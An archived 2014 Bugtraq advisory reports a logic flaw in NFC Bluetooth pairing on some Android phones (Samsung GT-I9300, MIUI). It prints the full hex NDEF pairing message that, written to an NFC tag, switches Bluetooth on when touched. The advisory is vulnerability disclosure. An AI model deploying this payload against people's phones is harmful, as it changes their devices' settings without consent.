| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 17 Sep 2014 02:35:56 GMT From: vuln@...c.org.cn To: bugtraq@...urityfocus.com Subject: Android Bluetooth Pairing Packet Processing Vulnerability(by wangzq from NCNIPC) I. Summary Bluetooth Pairing Packet is written to a NFC tag, which can be touched by a NFC mobile phone for bluetooth pairing. A logic flaw has been found in some versions of Andorid mobile phone. The flaw can cause NFC phones'bluetooth turned on, regardless of whether the pairing succeeds or not. ----------------------------------------------------------------- II. Description According to the NFC Bluetooth Simple Pairing Message Specification(NFC Forum), construct a message as follow. 91 02 0A 48 73 12 D1 02 04 61 63 01 01 30 00 5A 20 1C 01 61 70 70 6C 69 63 61 74 69 6F 6E 2F 76 6E 64 2E 62 6C 75 65 74 6F 6F 74 68 2E 65 70 2E 6F 6F 62 30 1C 00 79 E9 72 CA 6B F0 08 09 41 6E 64 72 6F 69 64 04 0D 0C 02 40 05 03 1E 11 0B 11 Then write the message to NFC tag. Touch the NFC tag with a smart phone with Samsung GT-I9300(defaultAndroid 4.1.2) or MI3(MIUI 5.30), bluetooth connection will be turned on automatically, regardless of whether the pairing succeeds or not. ------------------------------------------------------------------ III. Impact This bug cause bluetooth connection turned on automatically ------------------------------------------------------------------ IV. Affected Samsung GT-I9300(defaultAndroid 4.1.2) or other versions of default systems. MIUI 4.1.17/5.30 and other versions we don't test. ------------------------------------------------------------------ V. Solution modify the source codes about Bluetooth pairing message parsing.
Powered by blists - more mailing lists